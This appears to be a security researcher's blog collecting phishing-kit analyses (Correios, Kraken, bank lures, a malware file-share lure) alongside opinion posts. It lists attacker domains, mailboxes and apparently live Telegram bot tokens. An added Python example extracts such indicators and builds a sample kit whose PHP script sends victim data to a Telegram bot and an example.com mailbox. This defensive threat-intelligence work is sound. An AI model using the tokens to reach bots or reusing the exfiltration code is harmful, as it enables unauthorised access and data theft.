Correios phishing kit

In the last few weeks I have noticed that attacks on Correios are constant. I have studied the matter a bit: it is the Brazilian state company that manages shipments and payments related to them.

The scam is always the same: attackers write to users saying that a shipment is blocked and that a small payment is needed to release it. What is interesting about this attack is that when the user enters their CPF (Cadastro de Pessoas Físicas, the Brazilian taxpayer number), their personal data is displayed on the page, and this certainly makes the site look trustworthy to the victim.

The domain used for the attack is cpf-pendente[.]co[.]ua and it was registered a few hours ago.

The first curiosity is that the archive is a RAR instead of a ZIP. Someone hoped to make life difficult for Matrix, but I love writing code, and Matrix can open several types of archive, obviously including RAR 🙂

Aside from the archive type, what made me curious about this kit is the feature that retrieves the user's data starting from the CPF. I do not know Brazilian law, but being able to obtain personal data from a simple number seems unsafe to me.

The kit uses an external service to resolve the client data. I assume this service is part of the attack and probably relies in turn on another service, perhaps a legitimate one or a leak from who knows where. The service is available at the domain anonimobusca[.]online, which was registered one week ago.

To obtain the user information, the phishing kit calls a specific resource exposed by this second domain.

Another aspect concerns how payments are collected. The kit does not in fact collect the payment data itself: the user pays through third-party services that handle the transaction. The services used are:

  • paguesafe[.]com
  • atlaspagamentos[.]com

The URLs used are:

  • hxxps://checkout[.]paguesafe[.]io/pl/mn7xXvjg2N
  • hxxps://checkout[.]atlaspagamentos[.]com/pl/RQ9Kz7XTf8

Both services have been active for a short time, use cheap providers for domain management and have free certificates. In short, I would say that nothing about these services inspires trust.

To this I would add that the two graphical interfaces are practically identical.

Being a hacker

Nothing annoys me more than hearing the term “hacker” used as a synonym for “criminal”. I can actually accept it from people who do something else in life. It really bothers me when this abuse comes from people who say they are cyber security professionals.

I understand that in recent years everyone has become a cyber security expert. The same people who were previously blockchain experts, before that big data experts, and before that one of the many trends that have plagued IT. In many cases the right place for many of them would have been a nice industrial fryer for chips in a fast food restaurant.

“I know that I know nothing.” Having quoted Socrates, I can admit that I am not the right person to explain what a hacker is, so I refer to the Manifesto.

If you don’t work in IT and you don’t know it, it’s not serious.
If you work in IT and you don’t know it, it’s serious.
If you work in cyber security and you don’t know it, for me mayonnaise and ketchup 😉

Being a hacker means facing life with passion and living that passion without limits. This does not mean harming others. For this reason a hacker is not a criminal. He can become one if he harms others, but in doing so he becomes a criminal and must be treated as such.

Another thing: let’s be serious, “ethical hacker” is funny, it smacks of an elderly “script kiddie”!

I deactivated my Facebook account

After many years as a Facebook user, yesterday I deactivated my Facebook account. I also deleted my Instagram, although in fact I never used it. The people at Twitter had already blocked my account there, so now if you want to talk to me you have to send me an email or call me on the phone 🙂

I know it’s not a big deal, but several friends have been asking me why in the last few hours, so I decided to share the reason here, where I can write freely.

I’ve always had a fairly active social life on Facebook; I liked sharing what I was doing and taking part in what my friends were sharing. But my passion for social media faded when I realized that social media has become mainly a tool for revenge. Whoever has something stupid to say says it on social media. The real environment in which we live protects and regulates us: no one can say too much bullshit without being reprimanded. Social media, on the other hand, has in too many cases become the megaphone of morons.

Last month I tried deleting the app from my smartphone. It worked well, the usage time was reduced and it didn’t cost me any effort. Finally I could spend more time on the toilet with Nova Lectio.
The notification mechanism is evil, it needs to be managed, especially for young people who grew up with it and are convinced that it’s normal to always be available to others and, even worse, to a program that tries to sell you stuff or, even worse, to sell you to others.

After what happened in Romania, where a civilized state defended itself from a rigged outcome via social media. After seeing how the American government views Europe (and I am happy to be European). After seeing the support that social media gives to characters that I consider embarrassing for the human species. After all this, I thought it was better to take a step back.

I will continue to use LinkedIn because so far “mom Microsoft” is doing a great job and it seems to me that it continues to be a place where one can be at peace.

I’ve never kissed anyone’s ass, and I certainly won’t do it through someone else.

Business breakfast with fraud

Looking at what ends up in the Matrix network I noticed a kit that targets Kraken customers.

As usual, the victim is frightened with an alleged compromise of their account.

The interesting aspect of this kit is that instead of asking the victim to enter their wallet details, the application invites the victim to schedule a phone meeting. The user is asked to leave their phone number and is even given an .ics file with the appointment details, so that the victim remembers not to make other commitments 😀

The user data is sent to a Telegram bot as usual.

Checking the updates received by the bot, we find several messages still waiting to be read by the fraudster. Since the domain where we found the kit does not yet have it online, there must be other sites where the kit is already in operation.

Searching Elastic for domains with “kraken” in their names that are managed by the same DNS server (dnspod.com) brought up several other domains, including kraken-centre[.]com, which of course has the kit already online.

Why aren’t criminals’ email accounts closed?

Free time is increasingly scarce, but I still try to dedicate at least a couple of hours every week to analysing the Matrix evidence. Part of that time goes to analysing phishing kits and sharing the email and Telegram token indicators on my public ioc repo: https://github.com/ecarlesi/ioc.git

From this analysis a spontaneous question arises: why do the same accounts continue to be active over time? Does no one notice that they are being used for illicit purposes?

The obvious answer might be that Telegram is based in Dubai and was founded by a Russian, so maybe preventing or mitigating fraud is not at the forefront of their minds. Maybe. Let’s say the same goes for Yandex, which is Russian. Maybe. What I don’t understand, though, is why Gmail and Yahoo do not block these accounts either, to name two non-Russian companies.

Let’s take the segdairo as gmail dot com account for example. I personally found it in 5 different attacks, the first one dating back to May 13, 2024.

Later I found it in other kits, within which I identified other indicators:

  • hxxps://digitalbankingsonoraweb[.]online/verify/SONORA%20CU.zip contains the Telegram token 5453712056:AAE5M0Nnbcm0eanesMhIV62mNU_WgM20A6c
  • hxxps://dlgitaldove88system[.]online/FIRST%20FIFELITY%20BANK.zip contains the Telegram token 7223951606:AAHTkeSZ1UFauExPuwkzK_wfORFsldNFbnA
  • hxxps://digitalconnectfirstnow[.]online/FIRST%20UNITED%20BANK.zip contains the email account hakekelly07 at gmail dot com and the Telegram token 7103172103:AAFibon0scauwaJ6gnsY3vBfQ7e13IST9QY
  • hxxps://online-ctricbonline[.]cfd/cancel/login%20(1).zip contains the Telegram token 6318747656:AAFlcQchhlCb9DNkfpXvCEKXhSr0yINXgQc
  • hxxps://dashboardverfedconnect[.]online/VERMONT%20FCU.zip contains the Telegram token 7482950914:AAEupDhXYLKY_vvZHvwiCdgG_A2y4W5Jgn8
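As an added example (not code from the post or from Matrix), this is the kind of extraction the indicators above come from, and the same check applied to the Kraken kit earlier on the page: unpack a kit archive, scan its PHP/HTML sources for Telegram bot tokens, chat ids and mailboxes, build the getUpdates URL used to peek at the messages still waiting for the fraudster, and defang the result in the style of the ioc repo. The archive, the token, the chat id and the mailbox are constructed for the demo and are not live; the code uses the standard zipfile module, so a RAR kit would first need a RAR library.

```python
import io
import re
import zipfile

# Added example, not code from the post or from Matrix. The archive, token,
# chat id and mailbox below are constructed for the demo and are not live.

# Telegram bot tokens are "<numeric bot id>:<35 chars of [A-Za-z0-9_-]>",
# the same shape as the tokens listed in the post.
TELEGRAM_TOKEN_RE = re.compile(r"(?<![\w-])(\d{8,10}:[A-Za-z0-9_-]{35})(?![\w-])")
# Heuristic for the chat id the kit posts to; PHP kits usually keep it in a
# variable such as $chat_id = "123456789".
CHAT_ID_RE = re.compile(r"chat_?id\W{0,4}(-?\d{6,})", re.IGNORECASE)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")
# Only text sources are scanned; images and fonts inside kits are skipped.
TEXT_SUFFIXES = (".php", ".html", ".htm", ".js", ".txt", ".json", ".ini")


def extract_iocs(kit: zipfile.ZipFile) -> dict:
    """Return deduplicated, sorted (file, indicator) pairs for each indicator type."""
    found = {"telegram_tokens": set(), "chat_ids": set(), "emails": set()}
    for info in kit.infolist():
        if info.is_dir() or not info.filename.lower().endswith(TEXT_SUFFIXES):
            continue
        text = kit.read(info).decode("utf-8", errors="ignore")
        for token in TELEGRAM_TOKEN_RE.findall(text):
            found["telegram_tokens"].add((info.filename, token))
        for chat_id in CHAT_ID_RE.findall(text):
            found["chat_ids"].add((info.filename, chat_id))
        for addr in EMAIL_RE.findall(text):
            found["emails"].add((info.filename, addr.lower()))
    return {kind: sorted(pairs) for kind, pairs in found.items()}


def scan_kit_bytes(data: bytes) -> dict:
    """Convenience wrapper for an archive already held in memory."""
    return extract_iocs(zipfile.ZipFile(io.BytesIO(data)))


def telegram_getupdates_url(token: str) -> str:
    """Bot API call returning the updates nobody has acknowledged with an offset yet.

    It only works while the bot has no webhook configured, which is the usual
    case for kits that just fire sendMessage and never read replies.
    """
    return f"https://api.telegram.org/bot{token}/getUpdates"


def defang_email(addr: str) -> str:
    """Write a mailbox the way the ioc repo lists it: 'user at domain dot tld'."""
    local, domain = addr.split("@", 1)
    return f"{local} at {domain.replace('.', ' dot ')}"


def defang_url(url: str) -> str:
    """hxxps:// and [.] so the indicator is not clickable when shared."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


def build_sample_kit() -> bytes:
    """Constructed stand-in for a kit archive: a lure page plus the PHP exfil script."""
    files = {
        "kraken-centre/index.html": (
            "<form action='send.php' method='post'>"
            "<input name='phone'><button>Schedule a call</button></form>"
        ),
        "kraken-centre/send.php": (
            "<?php\n"
            "$token = '1234567890:AAFakeTokenForExampleOnly_012345678'; // constructed\n"
            "$chat_id = '987654321';\n"
            "$msg = 'phone: ' . $_POST['phone'];\n"
            "file_get_contents(\"https://api.telegram.org/bot$token/sendMessage"
            "?chat_id=$chat_id&text=\" . urlencode($msg));\n"
            "mail('kit-owner@example.com', 'new victim', $msg);\n"
            "header('Location: https://www.kraken.com/');\n"
        ),
        "kraken-centre/logo.png": "not really an image, skipped by suffix",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in files.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    iocs = scan_kit_bytes(build_sample_kit())
    for path, token in iocs["telegram_tokens"]:
        print(f"{path}: telegram token {token} -> {telegram_getupdates_url(token)}")
    for path, chat_id in iocs["chat_ids"]:
        print(f"{path}: chat id {chat_id}")
    for path, addr in iocs["emails"]:
        print(f"{path}: mailbox {defang_email(addr)}")
```

The token regex is anchored on both sides so a 36-character tail or a token glued to other text is rejected rather than truncated; the chat id pattern is deliberately loose, since kit authors name the variable differently, so treat it as a lead rather than a confirmed indicator.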

Not understanding why email accounts are not blocked even when they are clearly involved in illicit activities, I tried to understand how to report a criminal email account. Searching on the internet I found some instructions from Google about how to report an email you have received. However, I did not find how to report an address involved in illicit activities without having received any email from it in my Gmail account. I also found instructions regarding Google Workspace accounts, which are very convenient, but this is not the case here.

I finally found a link to the Internet Crime Complaint Center (ic3[.]gov). There is a form to report the event. It is now dinner time, given the length of the form, maybe I will do it after dinner.

Here I found something interesting: the Government explains how to recognize a legitimate Government domain: there is “.gov” and the padlock that indicates the use of https…

I would say it is not a very good criterion, since every day there are thousands of new domains that meet these requirements 😀

Phishing against Kraken

At the end of a pretty busy day, I finally found a few minutes to check the incoming notifications from Matrix. I noticed a kit that targets Kraken customers because its icon reminds me of the ghost from Pacman, and just today I got the vintage Pacman console 🙂

The domain used for the attack is krakeeen[.]top. It was registered three days ago and Matrix kept monitoring it, waiting for the kit, which arrived a few hours ago. Thanks, attacker 🙂

At the moment the only reports on this matter are those made by Matrix.

As usual, the kit is PHP based.

Every now and then someone tells me that my posts make it sound like I don’t love PHP! That’s not true: I really like PHP; it is the code that is often badly written and therefore sucks.

I love PHP and its community!!!!!

As for the stolen credentials, the kit sends them to the email address hardeyholar47@gmail[.]com.

Of course I added it to the list that I hope you already know 🙂

Attack against Correios

This morning I came across a kit aimed at Brazilian taxpayers. The domain used for the attack is consultarencomeda[.]online.

The attack is currently in its initial phase: the domain was registered a few hours ago and the kit has just been copied to the hosting. Matrix intercepted both events, analysed the archive containing the kit and sent the notification to urlscan. To date, no one reports this site as malicious.

The default page of the kit mimics a Hostinger landing page, in an attempt to block crawlers.

Opening the kit we discover how it works. At the base there is always the attempt to put pressure on the user; here the payment of a fee is demanded.

Without wasting time on how the kit works (as always, it is poorly written PHP code), I highlight the channels used for the payment and for sending notifications to the customer.

The transaction takes place through a service provided at the domain codetech-payment-fanpass[.]rancher[.]codefabrik[.]dev.

This service has no internet presence and is not advertised, nor have I been able to figure out who it is associated with.

Notifications are sent through pushcut[.]io. This is of course a legitimate service, and I hope that the presence of an API key in the kit can help the company identify the abuse.

Another source of malware

One of the features of Matrix is the monitoring of resources that have been detected as suspicious. This monitoring is useful to identify threats like the one I am writing about. An hour ago Matrix reported the site file-share-transfer[.]com as “opendir”, because there was no content inside.

A few minutes ago, however, the component that monitors already-detected resources notified an update. Matrix then ran the scan again and detected an active threat.

The site presents itself as a classic remote file drive that asks you to open a document. By clicking on the button, your local file browser (Explorer or Finder) opens, showing a well-presented artifact in an interface that is not very clear to an inexperienced user.

At first glance, in fact, you might think that the document presented is a local document, while in fact it is a link to a well-disguised remote file.

By proceeding, a link file is downloaded locally that references a malware that is downloaded from Alibaba’s cloud.

This attack is done fairly well: nothing particularly advanced, but overall it is very fluid and credible. Against a target with little expertise it certainly has a good chance of success.

This shows how necessary it is to improve security at the infrastructure level, because an attack like this will hardly be discovered by an average user. In my opinion, a stricter sandbox in the browser and a more precise analysis would be necessary. During this analysis my Chrome did not flag anything, and the same goes for Defender. There is still a lot of work to do to make everyone safe.

Script kiddie in action

Today I was analyzing some phishing kits collected by Matrix and this one struck me.

First of all, for the continuous duplication of code: there are ten files with practically the same code with minor changes; he could have written a function… but unfortunately he is an idiot, and so I come to the climax of the matter: the copyright notice on a redirect.

Also done badly, because the variable is useless.

Such incompetent people are forced to steal because no one would give them a job in IT 😀